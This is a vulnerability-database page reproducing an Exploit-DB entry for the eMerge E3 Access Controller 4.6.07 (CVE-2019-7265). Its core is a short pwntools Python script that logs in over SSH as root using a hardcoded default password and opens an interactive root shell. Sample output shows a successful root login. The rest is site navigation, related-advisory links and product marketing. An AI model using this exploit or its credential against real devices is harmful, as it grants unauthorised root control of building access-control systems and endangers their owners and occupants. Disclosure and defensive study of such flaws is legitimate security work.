Lucene search
K
Catalog
Vendors
Products
Timeline
Vulnerabilities
Sources
Documentation
Blog
Glossary
FAQ
Brand assets
Assessment
Agents dashboard
Agent Scanning
API Scanning
Assessment API
Alerts
Email notifications
Webhook notifications
Alerts API
SBOM package analysis
API Reference
Support
Settings
Sign in

eMerge E3 Access Controller 4.6.07 - Remote Code Execution

🗓️ 12 Nov 2019 00:00:00Reported by LiquidWormType 
exploitdb
 exploitdb🔗 www.exploit-db.com👁 359 Views

eMerge E3 Access Controller 4.6.07 - Remote Code Execution, ssh root acces

Related
Code
ReporterTitlePublishedViews
Family
IBM Security Bulletins		Security Bulletin: IBM QRadar Network Security is affected by Linux kernel vulnerabilities
25 Jul 201814:35
ibm
0day.today		Linux (x86) - Disable ASLR by Setting the RLIMIT_STACK Resource to Unlimited
6 Apr 201600:00
zdt
0day.today		FaceSentry Access Control System 6.4.8 - Remote SSH Root Exploit
2 Jul 201900:00
zdt
0day.today		eMerge E3 Access Controller 4.6.07 - Remote Code Execution Exploit
12 Nov 201900:00
zdt
0day.today		eMerge E3 Access Controller 4.6.07 - Remote Code Execution Exploit (2)
12 Nov 201900:00
zdt
Amazon		Medium: kernel
27 Apr 201600:00
amazon
Tenable Nessus		Amazon Linux AMI : kernel (ALAS-2016-694)
29 Apr 201600:00
nessus
Tenable Nessus		CentOS 7 : kernel (CESA-2018:1062)
27 Apr 201800:00
nessus
Tenable Nessus		Debian DLA-516-1 : linux security update
20 Jun 201600:00
nessus
Tenable Nessus		Debian DSA-3607-1 : linux - security update
29 Jun 201600:00
nessus
Rows per page
# Exploit Title: eMerge E3 Access Controller 4.6.07 - Remote Code Execution
# Google Dork: NA
# Date: 2018-11-11
# Exploit Author: LiquidWorm
# Vendor Homepage: http://linear-solutions.com/nsc_family/e3-series/
# Software Link: http://linear-solutions.com/nsc_family/e3-series/
# Version: 4.6.07
# Tested on: NA
# CVE : CVE-2019-7265
# Advisory: https://applied-risk.com/resources/ar-2019-009
# Paper: https://applied-risk.com/resources/i-own-your-building-management-system
# Advisory: https://applied-risk.com/resources/ar-2019-005

#!/usr/bin/env python
#
# ====
# python lineare3_sshroot.py 192.168.1.2
# [+] Connecting to 192.168.1.2 on port 22: Done
# [!] Only Linux is supported for ASLR checks.
# [*] [email protected]:
#     Distro    Unknown Unknown
#     OS:       Unknown
#     Arch:     Unknown
#     Version:  0.0.0
#     ASLR:     Disabled
#     Note:     Susceptible to ASLR ulimit trick (CVE-2016-3672)
# [+] Opening new channel: 'shell': Done
# [*] Switching to interactive mode
# Last login: Fri Nov  1 04:21:44 2019 from 192.168.2.17
# root@imx6slevk:~# id
# uid=0(root) gid=0(root) groups=0(root)
# root@imx6slevk:~# pwd
# /home/root
# root@imx6slevk:~# exit
# logout
# [*] Got EOF while reading in interactive
# [*] Closed SSH channel with 192.168.1.2
# ====

from pwn import *

if len(sys.argv) < 2:
    print 'Usage: ./e3.py <ip>\n'
    sys.exit()

ip = sys.argv[1]
rshell = ssh('root', ip, password='davestyle', port=22)
rshell.interactive()

Data

Build on a solid foundation with Vulners data

We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data

Api

Power your application with Vulners API

The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access

App

Assess and manage vulnerabilities with Vulners tools

Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation

Book a live demo
12 Nov 2019 00:00Current
7.8High risk
Vulners AI Score7.8
CVSS 210
CVSS 37.8
CVSS 3.19.8
EPSS0.40979
emerge e3access controllerremote code executionsshroot accesscve-2019-7265
359